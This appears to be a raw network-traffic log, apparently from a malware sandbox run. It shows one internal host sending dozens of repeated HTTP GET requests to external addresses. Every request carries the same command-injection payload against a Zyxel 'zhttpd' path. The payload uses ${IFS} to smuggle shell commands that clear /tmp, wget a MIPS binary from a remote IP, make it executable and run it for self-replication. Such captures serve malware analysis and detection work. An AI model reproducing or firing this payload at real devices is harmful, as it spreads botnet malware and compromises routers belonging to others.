                                    Jan 13, 2024 19:02:49.544223070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8384192.168.2.135926817.97.31.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.544296026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8385192.168.2.1336916208.219.166.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.544364929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8386192.168.2.135221049.55.112.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.544394016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8387192.168.2.1354424195.76.232.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.544469118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8388192.168.2.13445264.175.205.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.544507980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8389192.168.2.1352466219.6.174.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.544575930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8390192.168.2.133634038.11.42.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.544616938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8391192.168.2.1345320142.103.75.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.544667959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8392192.168.2.1339964204.60.178.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.544725895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8393192.168.2.1345860141.18.3.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.544778109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8394192.168.2.1340050206.160.111.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.544826031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8395192.168.2.1354208219.242.87.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.544852972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8396192.168.2.1353988153.201.254.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.544925928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8397192.168.2.136068666.131.146.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.544987917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8398192.168.2.1350472117.15.188.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.545037031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8399192.168.2.1358872152.23.127.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.545110941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8400192.168.2.1337956114.105.30.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.545196056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8401192.168.2.13477725.52.244.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.545218945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8402192.168.2.13470162.68.68.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.545279026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8403192.168.2.1335908222.70.148.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:49.545351982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8404192.168.2.134473681.159.35.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.552426100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8405192.168.2.134238265.24.159.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.552557945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8406192.168.2.13378905.138.160.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.552587986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8407192.168.2.133283870.52.113.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.552633047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8408192.168.2.134172087.116.147.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.552704096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8409192.168.2.13525662.3.20.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.552736998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8410192.168.2.133318697.207.160.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.552798033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8411192.168.2.1342674189.94.199.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.552831888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8412192.168.2.13509389.83.13.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.552902937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8413192.168.2.1350724109.149.253.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.552932978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8414192.168.2.1340614181.196.201.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.552954912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8415192.168.2.1335792168.155.54.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.553015947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8416192.168.2.1333694182.50.1.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.553076029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8417192.168.2.135520432.20.82.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.553113937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8418192.168.2.1339972109.248.65.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.553189993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8419192.168.2.134573850.191.61.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.553209066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8420192.168.2.1343814133.181.145.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.553277016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8421192.168.2.1358174120.183.90.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.553323030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8422192.168.2.1359404158.106.122.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.553361893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8423192.168.2.1343494194.250.144.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.553414106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8424192.168.2.134730877.210.24.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.553462982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8425192.168.2.134465438.165.175.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.553518057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8426192.168.2.1335090183.50.100.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.553571939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8427192.168.2.1343330166.41.2.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.553647041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8428192.168.2.133661250.131.142.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.553675890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8429192.168.2.13513961.88.130.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.553714991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8430192.168.2.135487068.173.219.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.553778887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8431192.168.2.134511234.143.104.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.553843975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8432192.168.2.1344224160.198.166.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.553878069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8433192.168.2.1360554104.91.8.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.553911924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8434192.168.2.134932677.103.121.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.553953886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8435192.168.2.1351944194.245.249.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.554003954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8436192.168.2.135929613.245.10.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.554042101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8437192.168.2.1340530208.33.4.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.554104090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8438192.168.2.1351738124.87.188.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.554141998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8439192.168.2.135275682.107.110.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.554205894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8440192.168.2.1349490209.127.201.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.554255009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8441192.168.2.1338760175.82.20.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.554320097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8442192.168.2.135725244.160.144.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.554348946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8443192.168.2.134583657.96.219.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.554378986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8444192.168.2.1351120101.203.23.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.554423094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8445192.168.2.1353046186.204.38.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:50.554466009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8446192.168.2.135358848.28.25.18443
                                    TimestampBytes transferredDirectionData
